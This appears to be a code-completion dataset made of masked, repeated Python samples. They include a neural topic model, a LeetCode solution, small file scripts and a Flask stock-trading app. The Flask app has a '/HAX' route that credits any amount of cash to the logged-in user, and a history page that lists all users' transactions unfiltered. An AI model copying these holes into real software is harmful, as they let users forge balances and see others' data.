self.en_drop(pi)\n else:\n pi = F.relu(self.en1_fc(x))\n pi = F.relu(self.en2_fc(pi))\n if self.encoder_shortcut:\n pi = self.en_drop(pi)\n\n # mean = self.mean_bn(self.mean_fc(pi))\n # logvar = self.logvar_bn(self.logvar_fc(pi))\n mean = self.mean_fc(pi)\n logvar = self.logvar_fc(pi)\n return mean, logvar\n\n def sampler(self, mean, logvar, cuda):\n eps = torch.randn(mean.size()).cuda(cuda)\n sigma = torch.exp(logvar)\n h = sigma.mul(eps).add_(mean)\n return h\n\n def generator(self, h):\n# temp = self.generator1(h)\n# if self.generator_shortcut:\n# r = F.tanh(temp) + h\n# else:\n# r = temp\n if self.generator_layers == 0:\n r = h\n elif self.generator_layers == 1:\n temp = self.generator1(h)\n if self.generator_shortcut:\n r = F.tanh(temp) + h\n else:\n r = temp\n elif self.generator_layers == 2:\n temp = F.tanh(self.generator1(h))\n temp2 = self.generator2(temp)\n if self.generator_shortcut:\n r = F.tanh(temp2) + h\n else:\n r = temp2\n else:\n temp = F.tanh(self.generator1(h))\n temp2 = F.tanh(self.generator2(temp))\n temp3 = F.tanh(self.generator3(temp2))\n temp4 = self.generator4(temp3)\n if self.generator_shortcut:\n r = F.tanh(temp4) + h\n else:\n r = temp4\n\n if self.generator_transform == 'tanh':\n return self.r_drop(F.tanh(r))\n elif self.generator_transform == 'softmax':\n return self.r_drop(F.softmax(r)[0])\n elif self.generator_transform == 'relu':\n return self.r_drop(F.relu(r))\n else:\n return self.r_drop(r)\n\n def decoder(self, r):\n # p_x_given_h = F.softmax(self.de_bn(self.de(r)))\n p_x_given_h = F.softmax(self.de(r))\n return p_x_given_h\n\n def init_rnn_hidden(self, batch_size, level):\n param_data = next(self.parameters()).data\n if level == \"word\":\n bidirectional_multipier = 2 if self.word_rnn_bidirectional else 1\n layer_size = self.word_rnn_num_layer * bidirectional_multipier\n word_rnn_init_hidden = param_data.new(layer_size, batch_size, self.word_rnn_size).zero_()\n return word_rnn_init_hidden\n elif level == \"context\":\n bidirectional_multipier = 2 if self.context_rnn_bidirectional else 1\n layer_size = self.context_rnn_num_layer * bidirectional_multipier\n context_rnn_init_hidden = param_data.new(layer_size, batch_size, self.context_rnn_size).zero_()\n return context_rnn_init_hidden\n else:\n raise Exception(\"level must be 'word' or 'context'\")\n\n def continuous_parameters(self):\n for name, param in self.named_parameters():\n if not name.startswith(\"selector\"):\n yield param\n\n def discrete_parameters(self):\n for name, param in self.named_parameters():\n if name.startswith(\"selector\"):\n yield param\n\n def forward(self, x, x_indices, input_list, length_list, cuda):\n ###topic model\n mean, logvar = self.encoder(x) # batchsize*50\n h = self.sampler(mean, logvar, cuda) # batchsize*50\n r = self.generator(h) # batchsize*50\n p_x_given_h = self.decoder(r) # batchsize*dv\n ###HAN\n num_utterance = len(input_list) # one batch doucument_list\n _, batch_size = input_list[0].size()\n # word-level rnn\n word_rnn_hidden = self.init_rnn_hidden(batch_size, level=\"word\")\n word_rnn_output_list = []\n word_attention_dict = {}\n # de_weight = torch.zeros(self.d_v, self.d_t).cuda()\n # de_weight.copy_(self.de.weight.data)\n for utterance_index in range(num_utterance):\n word_rnn_input = self.embedding(input_list[utterance_index])\n word_rnn_output, word_rnn_hidden = self.word_rnn(word_rnn_input, word_rnn_hidden)\n word_attention_weight = self.word_conv_attention_linear(word_rnn_output)\n\n # word_attention_weight = Variable(torch.zeros(word_attention_weight.size()).cuda())\n batch_data = input_list[utterance_index]\n for word_i in range(len(batch_data)): # word_i word\n for clause_i in range(len(batch_data[word_i])): # clause_i data(batch)\n word_index = int(batch_data[word_i, clause_i]) # word index\n if word_index < self.d_v:\n if word_index in word_attention_dict:\n word_attention_dict[word_index] = (word_attention_dict[word_index] + word_attention_weight[word_i, clause_i,:]) / 2\n else:\n word_attention_dict[word_index] = word_attention_weight[word_i, clause_i, :]\n\n ##HAN\n word_attention_weight = self.word_conv_attention_linear2(word_attention_weight)\n word_attention_weight = nn.functional.relu(word_attention_weight)\n word_attention_weight = nn.functional.softmax(word_attention_weight, dim=0)\n word_rnn_last_output = torch.mul(word_rnn_output, word_attention_weight).sum(dim=0)\n word_rnn_output_list.append(word_rnn_last_output)\n word_rnn_hidden = word_rnn_hidden.detach()\n # context-level rnn\n context_rnn_hidden = self.init_rnn_hidden(batch_size, level=\"context\")\n context_rnn_input = torch.stack(word_rnn_output_list, dim=0)\n context_rnn_output, context_rnn_hidden = self.context_rnn(context_rnn_input, context_rnn_hidden)\n context_attention_weight = self.context_conv_attention_linear(context_rnn_output)\n context_attention_weight = nn.functional.relu(context_attention_weight)\n context_attention_weight = nn.functional.softmax(context_attention_weight, dim=0)\n context_rnn_last_output = torch.mul(context_rnn_output, context_attention_weight).sum(dim=0)\n classifier_input = context_rnn_last_output\n logit = self.classifier(classifier_input)\n\n return mean, logvar, p_x_given_h, logit, word_attention_dict",
"step-ids": [
5,
6,
8,
11,
12
]
}
|
[
5,
6,
8,
11,
12
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from external.odds.betclic.api import get_odds
<|reserved_special_token_1|>
from external.odds.betclic.api import get_odds
# FDJ parsing is broken - their UI has been refactored with JS framework &
# protected async JSON API usage (requires HEADERS) and more complex to isolate & group match odds
# hence move to another betting website - which is still full html rendered
|
flexible
|
{
"blob_id": "8b583ee55df409020a605b467479236e610a2efe",
"index": 3646,
"step-1": "<mask token>\n",
"step-2": "from external.odds.betclic.api import get_odds\n",
"step-3": "from external.odds.betclic.api import get_odds\n\n# FDJ parsing is broken - their UI has been refactored with JS framework &\n# protected async JSON API usage (requires HEADERS) and more complex to isolate & group match odds\n# hence move to another betting website - which is still full html rendered\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
with open(
'D:\\Documents\\PythonDocs\\ehmatthes-pcc-f555082\\chapter_10\\programming.txt'
) as f_obj:
lines = f_obj.readlines()
<|reserved_special_token_0|>
for line in lines:
m_line = line.replace('python', 'C#')
m_lines.append(m_line)
with open(
'D:\\Documents\\PythonDocs\\ehmatthes-pcc-f555082\\chapter_10\\programming1.txt'
, 'w') as f_obj:
for line in m_lines:
f_obj.write(line)
with open(
'D:\\Documents\\PythonDocs\\ehmatthes-pcc-f555082\\chapter_10\\guestbook.txt'
, 'w') as f_obj:
while True:
username = input('Please input your name. ')
if username == 'q':
break
else:
t = str(datetime.datetime.now())
f_obj.write(username + ' has visited at ' + t + '\n')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
with open(
'D:\\Documents\\PythonDocs\\ehmatthes-pcc-f555082\\chapter_10\\programming.txt'
) as f_obj:
lines = f_obj.readlines()
m_lines = []
for line in lines:
m_line = line.replace('python', 'C#')
m_lines.append(m_line)
with open(
'D:\\Documents\\PythonDocs\\ehmatthes-pcc-f555082\\chapter_10\\programming1.txt'
, 'w') as f_obj:
for line in m_lines:
f_obj.write(line)
with open(
'D:\\Documents\\PythonDocs\\ehmatthes-pcc-f555082\\chapter_10\\guestbook.txt'
, 'w') as f_obj:
while True:
username = input('Please input your name. ')
if username == 'q':
break
else:
t = str(datetime.datetime.now())
f_obj.write(username + ' has visited at ' + t + '\n')
<|reserved_special_token_1|>
import datetime
with open(
'D:\\Documents\\PythonDocs\\ehmatthes-pcc-f555082\\chapter_10\\programming.txt'
) as f_obj:
lines = f_obj.readlines()
m_lines = []
for line in lines:
m_line = line.replace('python', 'C#')
m_lines.append(m_line)
with open(
'D:\\Documents\\PythonDocs\\ehmatthes-pcc-f555082\\chapter_10\\programming1.txt'
, 'w') as f_obj:
for line in m_lines:
f_obj.write(line)
with open(
'D:\\Documents\\PythonDocs\\ehmatthes-pcc-f555082\\chapter_10\\guestbook.txt'
, 'w') as f_obj:
while True:
username = input('Please input your name. ')
if username == 'q':
break
else:
t = str(datetime.datetime.now())
f_obj.write(username + ' has visited at ' + t + '\n')
<|reserved_special_token_1|>
import datetime
with open('D:\Documents\PythonDocs\ehmatthes-pcc-f555082\chapter_10\programming.txt') as f_obj:
lines = f_obj.readlines()
m_lines = []
for line in lines:
m_line = line.replace('python', 'C#')
m_lines.append(m_line)
with open('D:\Documents\PythonDocs\ehmatthes-pcc-f555082\chapter_10\programming1.txt', 'w') as f_obj:
for line in m_lines:
f_obj.write(line)
with open('D:\Documents\PythonDocs\ehmatthes-pcc-f555082\chapter_10\guestbook.txt', 'w') as f_obj:
while True:
username = input('Please input your name. ')
if username == 'q':
break
else:
t = str(datetime.datetime.now())
f_obj.write(username + ' has visited at ' + t + '\n')
|
flexible
|
{
"blob_id": "03da813650d56e7ab92885b698d4af3a51176903",
"index": 3878,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith open(\n 'D:\\\\Documents\\\\PythonDocs\\\\ehmatthes-pcc-f555082\\\\chapter_10\\\\programming.txt'\n ) as f_obj:\n lines = f_obj.readlines()\n<mask token>\nfor line in lines:\n m_line = line.replace('python', 'C#')\n m_lines.append(m_line)\nwith open(\n 'D:\\\\Documents\\\\PythonDocs\\\\ehmatthes-pcc-f555082\\\\chapter_10\\\\programming1.txt'\n , 'w') as f_obj:\n for line in m_lines:\n f_obj.write(line)\nwith open(\n 'D:\\\\Documents\\\\PythonDocs\\\\ehmatthes-pcc-f555082\\\\chapter_10\\\\guestbook.txt'\n , 'w') as f_obj:\n while True:\n username = input('Please input your name. ')\n if username == 'q':\n break\n else:\n t = str(datetime.datetime.now())\n f_obj.write(username + ' has visited at ' + t + '\\n')\n",
"step-3": "<mask token>\nwith open(\n 'D:\\\\Documents\\\\PythonDocs\\\\ehmatthes-pcc-f555082\\\\chapter_10\\\\programming.txt'\n ) as f_obj:\n lines = f_obj.readlines()\nm_lines = []\nfor line in lines:\n m_line = line.replace('python', 'C#')\n m_lines.append(m_line)\nwith open(\n 'D:\\\\Documents\\\\PythonDocs\\\\ehmatthes-pcc-f555082\\\\chapter_10\\\\programming1.txt'\n , 'w') as f_obj:\n for line in m_lines:\n f_obj.write(line)\nwith open(\n 'D:\\\\Documents\\\\PythonDocs\\\\ehmatthes-pcc-f555082\\\\chapter_10\\\\guestbook.txt'\n , 'w') as f_obj:\n while True:\n username = input('Please input your name. ')\n if username == 'q':\n break\n else:\n t = str(datetime.datetime.now())\n f_obj.write(username + ' has visited at ' + t + '\\n')\n",
"step-4": "import datetime\nwith open(\n 'D:\\\\Documents\\\\PythonDocs\\\\ehmatthes-pcc-f555082\\\\chapter_10\\\\programming.txt'\n ) as f_obj:\n lines = f_obj.readlines()\nm_lines = []\nfor line in lines:\n m_line = line.replace('python', 'C#')\n m_lines.append(m_line)\nwith open(\n 'D:\\\\Documents\\\\PythonDocs\\\\ehmatthes-pcc-f555082\\\\chapter_10\\\\programming1.txt'\n , 'w') as f_obj:\n for line in m_lines:\n f_obj.write(line)\nwith open(\n 'D:\\\\Documents\\\\PythonDocs\\\\ehmatthes-pcc-f555082\\\\chapter_10\\\\guestbook.txt'\n , 'w') as f_obj:\n while True:\n username = input('Please input your name. ')\n if username == 'q':\n break\n else:\n t = str(datetime.datetime.now())\n f_obj.write(username + ' has visited at ' + t + '\\n')\n",
"step-5": "import datetime\n\n\nwith open('D:\\Documents\\PythonDocs\\ehmatthes-pcc-f555082\\chapter_10\\programming.txt') as f_obj:\n lines = f_obj.readlines()\n\nm_lines = []\n\nfor line in lines:\n m_line = line.replace('python', 'C#')\n m_lines.append(m_line)\n\nwith open('D:\\Documents\\PythonDocs\\ehmatthes-pcc-f555082\\chapter_10\\programming1.txt', 'w') as f_obj:\n for line in m_lines:\n f_obj.write(line)\n\nwith open('D:\\Documents\\PythonDocs\\ehmatthes-pcc-f555082\\chapter_10\\guestbook.txt', 'w') as f_obj:\n while True:\n username = input('Please input your name. ')\n if username == 'q':\n break\n else:\n t = str(datetime.datetime.now())\n f_obj.write(username + ' has visited at ' + t + '\\n')\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
k = 0
for x in range(100, 1000, 2):
x = str(x)
if x[0] == x[1] or x[0] == x[2] or x[1] == x[2]:
k += 1
print(k)
|
normal
|
{
"blob_id": "af6dd7bde25453f25c0701e4ac246ff6bce29fa7",
"index": 1141,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor x in range(100, 1000, 2):\n x = str(x)\n if x[0] == x[1] or x[0] == x[2] or x[1] == x[2]:\n k += 1\nprint(k)\n",
"step-3": "k = 0\nfor x in range(100, 1000, 2):\n x = str(x)\n if x[0] == x[1] or x[0] == x[2] or x[1] == x[2]:\n k += 1\nprint(k)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Solution:
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Solution:
def minNumberOfFrogs(self, croakOfFrogs: str) ->int:
c, r, o, a, k = 0, 0, 0, 0, 0
ans = 0
for i in range(len(croakOfFrogs)):
if croakOfFrogs[i] == 'c':
c += 1
if croakOfFrogs[i] == 'r':
r += 1
if croakOfFrogs[i] == 'o':
o += 1
if croakOfFrogs[i] == 'a':
a += 1
if croakOfFrogs[i] == 'k':
k += 1
ans = max(c - k, ans)
if c >= r and r >= o and o >= a and a >= k:
continue
else:
break
if c == r and r == o and o == a and a == k:
return ans
else:
return -1
<|reserved_special_token_1|>
#给你一个字符串 croakOfFrogs,它表示不同青蛙发出的蛙鸣声(字符串 "croak" )的组合。由于同一时间可以有多只青蛙呱呱作响,所以 croakOfFrogs 中会混合多个 “croak” 。请你返回模拟字符串中所有蛙鸣所需不同青蛙的最少数目。
#注意:要想发出蛙鸣 "croak",青蛙必须 依序 输出 ‘c’, ’r’, ’o’, ’a’, ’k’ 这 5 个字母。如果没有输出全部五个字母,那么它就不会发出声音。
#如果字符串 croakOfFrogs 不是由若干有效的 "croak" 字符混合而成,请返回 -1 。
#来源:力扣(LeetCode)
#链接:https://leetcode-cn.com/problems/minimum-number-of-frogs-croaking
#著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。
class Solution:
def minNumberOfFrogs(self, croakOfFrogs: str) -> int:
#c一定在最前--k一定在最后
c,r,o,a,k=0,0,0,0,0
ans=0
for i in range(len(croakOfFrogs)):
if croakOfFrogs[i]=="c":
c+=1
if croakOfFrogs[i]=="r":
r+=1
if croakOfFrogs[i]=="o":
o+=1
if croakOfFrogs[i]=="a":
a+=1
if croakOfFrogs[i]=="k":
k+=1
ans=max(c-k,ans)
if(c>=r and r>=o and o>=a and a>=k):
continue
else:
break
if (c==r and r==o and o==a and a==k):
return ans
else:
return -1
|
flexible
|
{
"blob_id": "b4491b5522e85fec64164b602045b9bd3e58c5b8",
"index": 4666,
"step-1": "<mask token>\n",
"step-2": "class Solution:\n <mask token>\n",
"step-3": "class Solution:\n\n def minNumberOfFrogs(self, croakOfFrogs: str) ->int:\n c, r, o, a, k = 0, 0, 0, 0, 0\n ans = 0\n for i in range(len(croakOfFrogs)):\n if croakOfFrogs[i] == 'c':\n c += 1\n if croakOfFrogs[i] == 'r':\n r += 1\n if croakOfFrogs[i] == 'o':\n o += 1\n if croakOfFrogs[i] == 'a':\n a += 1\n if croakOfFrogs[i] == 'k':\n k += 1\n ans = max(c - k, ans)\n if c >= r and r >= o and o >= a and a >= k:\n continue\n else:\n break\n if c == r and r == o and o == a and a == k:\n return ans\n else:\n return -1\n",
"step-4": "#给你一个字符串 croakOfFrogs,它表示不同青蛙发出的蛙鸣声(字符串 \"croak\" )的组合。由于同一时间可以有多只青蛙呱呱作响,所以 croakOfFrogs 中会混合多个 “croak” 。请你返回模拟字符串中所有蛙鸣所需不同青蛙的最少数目。\n\n#注意:要想发出蛙鸣 \"croak\",青蛙必须 依序 输出 ‘c’, ’r’, ’o’, ’a’, ’k’ 这 5 个字母。如果没有输出全部五个字母,那么它就不会发出声音。\n\n#如果字符串 croakOfFrogs 不是由若干有效的 \"croak\" 字符混合而成,请返回 -1 。\n\n#来源:力扣(LeetCode)\n#链接:https://leetcode-cn.com/problems/minimum-number-of-frogs-croaking\n#著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\nclass Solution:\n def minNumberOfFrogs(self, croakOfFrogs: str) -> int:\n #c一定在最前--k一定在最后\n c,r,o,a,k=0,0,0,0,0\n ans=0\n for i in range(len(croakOfFrogs)):\n if croakOfFrogs[i]==\"c\":\n c+=1\n if croakOfFrogs[i]==\"r\":\n r+=1\n if croakOfFrogs[i]==\"o\":\n o+=1\n if croakOfFrogs[i]==\"a\":\n a+=1\n if croakOfFrogs[i]==\"k\":\n k+=1\n ans=max(c-k,ans)\n if(c>=r and r>=o and o>=a and a>=k):\n continue\n else:\n break\n if (c==r and r==o and o==a and a==k):\n return ans\n else:\n return -1\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
@app.route('/buy', methods=['GET', 'POST'])
@login_required
def buy():
"""Buy shares of stock"""
if request.method == 'POST':
if not request.form.get('symbol'):
return apology('must provide symbol', 400)
elif not request.form.get('shares'):
return apology('must provide shares', 400)
if not request.form.get('shares').isdigit():
return apology('must be integer', 400)
elif int(request.form.get('shares')) < 1:
return apology('must be positive integer', 400)
elif lookup(request.form.get('symbol')) == None:
return apology('Must be a valid symbol', 400)
quote = lookup(request.form.get('symbol'))
shares = request.form.get('shares')
cash = db.execute('SELECT cash FROM users WHERE id=?', session[
'user_id'])
if cash[0]['cash'] < int(quote['price']) * int(shares):
return apology("You can't affort this/these", 400)
db.execute(
"INSERT INTO record(userID,transactions,symbol,price,t1) VALUES(?,?,?,?,strftime('%Y-%m-%d %H:%M:%S','now'))"
, session['user_id'], int(shares), quote['symbol'], float(quote
['price']))
total = int(quote['price']) * int(shares)
db.execute('UPDATE users SET cash=cash- (?) WHERE id=?', total,
session['user_id'])
return redirect('/')
else:
return render_template('buy.html')
<|reserved_special_token_0|>
@app.route('/logout')
def logout():
"""Log user out"""
session.clear()
return redirect('/')
<|reserved_special_token_0|>
@app.route('/register', methods=['GET', 'POST'])
def register():
"""Register user"""
if request.method == 'POST':
if not request.form.get('username'):
return apology('must provide username', 400)
elif not request.form.get('password'):
return apology('must provide password', 400)
elif not request.form.get('confirmation'):
return apology('must comfirm password', 400)
elif request.form.get('confirmation') != request.form.get('password'):
return apology('Password not matches', 400)
rows = db.execute('SELECT * FROM users WHERE username = ?', request
.form.get('username'))
if len(rows) != 0:
return apology('username used', 400)
db.execute('INSERT INTO users (username,hash) VALUES (?,?)',
request.form.get('username'), generate_password_hash(request.
form.get('password')))
return redirect('/')
else:
return render_template('register.html')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@app.after_request
def after_request(response):
response.headers['Cache-Control'] = 'no-cache, no-store, must-revalidate'
response.headers['Expires'] = 0
response.headers['Pragma'] = 'no-cache'
return response
<|reserved_special_token_0|>
@app.route('/')
@login_required
def index():
"""Show portfolio of stocks"""
rows = db.execute(
'SELECT symbol, SUM(transactions) as amount FROM record WHERE userID=? GROUP BY symbol HAVING transactions'
, session['user_id'])
cash = db.execute('SELECT cash FROM users WHERE id=?', session['user_id'])
cash_ = cash[0]['cash']
display = []
total_share = 0
for row in rows:
symbol = str(row['symbol'])
print(symbol)
name = lookup(symbol)['name']
shares = int(row['amount'])
price = float(lookup(symbol)['price'])
total = float(shares) * price
total_share += total
display.append({'symbol': symbol, 'name': name, 'shares': shares,
'price': price, 'total': total})
total_money = total_share + cash[0]['cash']
return render_template('index.html', display=display, total_money=
total_money, cash=cash_)
@app.route('/buy', methods=['GET', 'POST'])
@login_required
def buy():
"""Buy shares of stock"""
if request.method == 'POST':
if not request.form.get('symbol'):
return apology('must provide symbol', 400)
elif not request.form.get('shares'):
return apology('must provide shares', 400)
if not request.form.get('shares').isdigit():
return apology('must be integer', 400)
elif int(request.form.get('shares')) < 1:
return apology('must be positive integer', 400)
elif lookup(request.form.get('symbol')) == None:
return apology('Must be a valid symbol', 400)
quote = lookup(request.form.get('symbol'))
shares = request.form.get('shares')
cash = db.execute('SELECT cash FROM users WHERE id=?', session[
'user_id'])
if cash[0]['cash'] < int(quote['price']) * int(shares):
return apology("You can't affort this/these", 400)
db.execute(
"INSERT INTO record(userID,transactions,symbol,price,t1) VALUES(?,?,?,?,strftime('%Y-%m-%d %H:%M:%S','now'))"
, session['user_id'], int(shares), quote['symbol'], float(quote
['price']))
total = int(quote['price']) * int(shares)
db.execute('UPDATE users SET cash=cash- (?) WHERE id=?', total,
session['user_id'])
return redirect('/')
else:
return render_template('buy.html')
<|reserved_special_token_0|>
@app.route('/login', methods=['GET', 'POST'])
def login():
"""Log user in"""
session.clear()
if request.method == 'POST':
if not request.form.get('username'):
return apology('must provide username', 403)
elif not request.form.get('password'):
return apology('must provide password', 403)
rows = db.execute('SELECT * FROM users WHERE username = ?', request
.form.get('username'))
if len(rows) != 1 or not check_password_hash(rows[0]['hash'],
request.form.get('password')):
return apology('invalid username and/or password', 403)
session['user_id'] = rows[0]['id']
return redirect('/')
else:
return render_template('login.html')
@app.route('/logout')
def logout():
"""Log user out"""
session.clear()
return redirect('/')
@app.route('/quote', methods=['GET', 'POST'])
@login_required
def quote():
"""Get stock quote."""
if request.method == 'POST':
quote = lookup(request.form.get('symbol'))
if quote == None:
return apology('Invalid symbol', 400)
price = usd(quote['price'])
return render_template('quoted.html', quote=quote, price=price)
else:
return render_template('quote.html')
@app.route('/register', methods=['GET', 'POST'])
def register():
"""Register user"""
if request.method == 'POST':
if not request.form.get('username'):
return apology('must provide username', 400)
elif not request.form.get('password'):
return apology('must provide password', 400)
elif not request.form.get('confirmation'):
return apology('must comfirm password', 400)
elif request.form.get('confirmation') != request.form.get('password'):
return apology('Password not matches', 400)
rows = db.execute('SELECT * FROM users WHERE username = ?', request
.form.get('username'))
if len(rows) != 0:
return apology('username used', 400)
db.execute('INSERT INTO users (username,hash) VALUES (?,?)',
request.form.get('username'), generate_password_hash(request.
form.get('password')))
return redirect('/')
else:
return render_template('register.html')
<|reserved_special_token_0|>
@app.route('/HAX', methods=['GET', 'POST'])
@login_required
def HAX():
if request.method == 'POST':
total = request.form.get('HAX')
db.execute('UPDATE users SET cash=cash+ (?) WHERE id=?', total,
session['user_id'])
flash(u'HAX SUCCESSFULLY ACTIVATED!!!')
return redirect('/')
else:
return render_template('HAX.html')
def errorhandler(e):
"""Handle error"""
if not isinstance(e, HTTPException):
e = InternalServerError()
return apology(e.name, e.code)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
app = Flask(__name__)
app.config['TEMPLATES_AUTO_RELOAD'] = True
@app.after_request
def after_request(response):
response.headers['Cache-Control'] = 'no-cache, no-store, must-revalidate'
response.headers['Expires'] = 0
response.headers['Pragma'] = 'no-cache'
return response
app.jinja_env.filters['usd'] = usd
app.config['SESSION_FILE_DIR'] = mkdtemp()
app.config['SESSION_PERMANENT'] = False
app.config['SESSION_TYPE'] = 'filesystem'
Session(app)
db = SQL('sqlite:///finance.db')
if not os.environ.get('API_KEY'):
raise RuntimeError('API_KEY not set')
@app.route('/')
@login_required
def index():
"""Show portfolio of stocks"""
rows = db.execute(
'SELECT symbol, SUM(transactions) as amount FROM record WHERE userID=? GROUP BY symbol HAVING transactions'
, session['user_id'])
cash = db.execute('SELECT cash FROM users WHERE id=?', session['user_id'])
cash_ = cash[0]['cash']
display = []
total_share = 0
for row in rows:
symbol = str(row['symbol'])
print(symbol)
name = lookup(symbol)['name']
shares = int(row['amount'])
price = float(lookup(symbol)['price'])
total = float(shares) * price
total_share += total
display.append({'symbol': symbol, 'name': name, 'shares': shares,
'price': price, 'total': total})
total_money = total_share + cash[0]['cash']
return render_template('index.html', display=display, total_money=
total_money, cash=cash_)
@app.route('/buy', methods=['GET', 'POST'])
@login_required
def buy():
"""Buy shares of stock"""
if request.method == 'POST':
if not request.form.get('symbol'):
return apology('must provide symbol', 400)
elif not request.form.get('shares'):
return apology('must provide shares', 400)
if not request.form.get('shares').isdigit():
return apology('must be integer', 400)
elif int(request.form.get('shares')) < 1:
return apology('must be positive integer', 400)
elif lookup(request.form.get('symbol')) == None:
return apology('Must be a valid symbol', 400)
quote = lookup(request.form.get('symbol'))
shares = request.form.get('shares')
cash = db.execute('SELECT cash FROM users WHERE id=?', session[
'user_id'])
if cash[0]['cash'] < int(quote['price']) * int(shares):
return apology("You can't affort this/these", 400)
db.execute(
"INSERT INTO record(userID,transactions,symbol,price,t1) VALUES(?,?,?,?,strftime('%Y-%m-%d %H:%M:%S','now'))"
, session['user_id'], int(shares), quote['symbol'], float(quote
['price']))
total = int(quote['price']) * int(shares)
db.execute('UPDATE users SET cash=cash- (?) WHERE id=?', total,
session['user_id'])
return redirect('/')
else:
return render_template('buy.html')
@app.route('/history')
@login_required
def history():
"""Show history of transactions"""
rows = db.execute('SELECT * FROM record ORDER BY t1')
return render_template('history.html', rows=rows)
@app.route('/login', methods=['GET', 'POST'])
def login():
"""Log user in"""
session.clear()
if request.method == 'POST':
if not request.form.get('username'):
return apology('must provide username', 403)
elif not request.form.get('password'):
return apology('must provide password', 403)
rows = db.execute('SELECT * FROM users WHERE username = ?', request
.form.get('username'))
if len(rows) != 1 or not check_password_hash(rows[0]['hash'],
request.form.get('password')):
return apology('invalid username and/or password', 403)
session['user_id'] = rows[0]['id']
return redirect('/')
else:
return render_template('login.html')
@app.route('/logout')
def logout():
"""Log user out"""
session.clear()
return redirect('/')
@app.route('/quote', methods=['GET', 'POST'])
@login_required
def quote():
"""Get stock quote."""
if request.method == 'POST':
quote = lookup(request.form.get('symbol'))
if quote == None:
return apology('Invalid symbol', 400)
price = usd(quote['price'])
return render_template('quoted.html', quote=quote, price=price)
else:
return render_template('quote.html')
@app.route('/register', methods=['GET', 'POST'])
def register():
"""Register user"""
if request.method == 'POST':
if not request.form.get('username'):
return apology('must provide username', 400)
elif not request.form.get('password'):
return apology('must provide password', 400)
elif not request.form.get('confirmation'):
return apology('must comfirm password', 400)
elif request.form.get('confirmation') != request.form.get('password'):
return apology('Password not matches', 400)
rows = db.execute('SELECT * FROM users WHERE username = ?', request
.form.get('username'))
if len(rows) != 0:
return apology('username used', 400)
db.execute('INSERT INTO users (username,hash) VALUES (?,?)',
request.form.get('username'), generate_password_hash(request.
form.get('password')))
return redirect('/')
else:
return render_template('register.html')
@app.route('/sell', methods=['GET', 'POST'])
@login_required
def sell():
"""Sell shares of stock"""
if request.method == 'POST':
if not request.form.get('shares'):
return apology('Please enter how much u want to sell', 400)
sell = request.form.get('symbol')
shares = request.form.get('shares')
amount = db.execute(
'SELECT SUM(transactions) as amount FROM record WHERE userID=? AND symbol=? GROUP BY symbol HAVING transactions'
, session['user_id'], sell)
if amount[0]['amount'] < int(shares):
return apology('You dont own that much shares', 400)
quote = lookup(sell)
price = quote['price']
total = int(price) * int(shares)
db.execute(
"INSERT INTO record(userID,transactions,symbol,price,t1) VALUES(?,?,?,?,strftime('%s','now'))"
, session['user_id'], int(shares) * -1, quote['symbol'], price)
db.execute('UPDATE users SET cash=cash+ (?) WHERE id=?', total,
session['user_id'])
return redirect('/')
else:
rows = db.execute(
'SELECT symbol, SUM(transactions) as amount FROM record WHERE userID=? GROUP BY symbol HAVING transactions'
, session['user_id'])
return render_template('sell.html', rows=rows)
@app.route('/HAX', methods=['GET', 'POST'])
@login_required
def HAX():
if request.method == 'POST':
total = request.form.get('HAX')
db.execute('UPDATE users SET cash=cash+ (?) WHERE id=?', total,
session['user_id'])
flash(u'HAX SUCCESSFULLY ACTIVATED!!!')
return redirect('/')
else:
return render_template('HAX.html')
def errorhandler(e):
"""Handle error"""
if not isinstance(e, HTTPException):
e = InternalServerError()
return apology(e.name, e.code)
for code in default_exceptions:
app.errorhandler(code)(errorhandler)
<|reserved_special_token_1|>
import os
from cs50 import SQL
from flask import Flask, flash, redirect, render_template, request, session
from flask_session import Session
from tempfile import mkdtemp
from werkzeug.exceptions import default_exceptions, HTTPException, InternalServerError
from werkzeug.security import check_password_hash, generate_password_hash
from helpers import apology, login_required, lookup, usd
app = Flask(__name__)
app.config['TEMPLATES_AUTO_RELOAD'] = True
@app.after_request
def after_request(response):
response.headers['Cache-Control'] = 'no-cache, no-store, must-revalidate'
response.headers['Expires'] = 0
response.headers['Pragma'] = 'no-cache'
return response
app.jinja_env.filters['usd'] = usd
app.config['SESSION_FILE_DIR'] = mkdtemp()
app.config['SESSION_PERMANENT'] = False
app.config['SESSION_TYPE'] = 'filesystem'
Session(app)
db = SQL('sqlite:///finance.db')
if not os.environ.get('API_KEY'):
raise RuntimeError('API_KEY not set')
@app.route('/')
@login_required
def index():
"""Show portfolio of stocks"""
rows = db.execute(
'SELECT symbol, SUM(transactions) as amount FROM record WHERE userID=? GROUP BY symbol HAVING transactions'
, session['user_id'])
cash = db.execute('SELECT cash FROM users WHERE id=?', session['user_id'])
cash_ = cash[0]['cash']
display = []
total_share = 0
for row in rows:
symbol = str(row['symbol'])
print(symbol)
name = lookup(symbol)['name']
shares = int(row['amount'])
price = float(lookup(symbol)['price'])
total = float(shares) * price
total_share += total
display.append({'symbol': symbol, 'name': name, 'shares': shares,
'price': price, 'total': total})
total_money = total_share + cash[0]['cash']
return render_template('index.html', display=display, total_money=
total_money, cash=cash_)
@app.route('/buy', methods=['GET', 'POST'])
@login_required
def buy():
"""Buy shares of stock"""
if request.method == 'POST':
if not request.form.get('symbol'):
return apology('must provide symbol', 400)
elif not request.form.get('shares'):
return apology('must provide shares', 400)
if not request.form.get('shares').isdigit():
return apology('must be integer', 400)
elif int(request.form.get('shares')) < 1:
return apology('must be positive integer', 400)
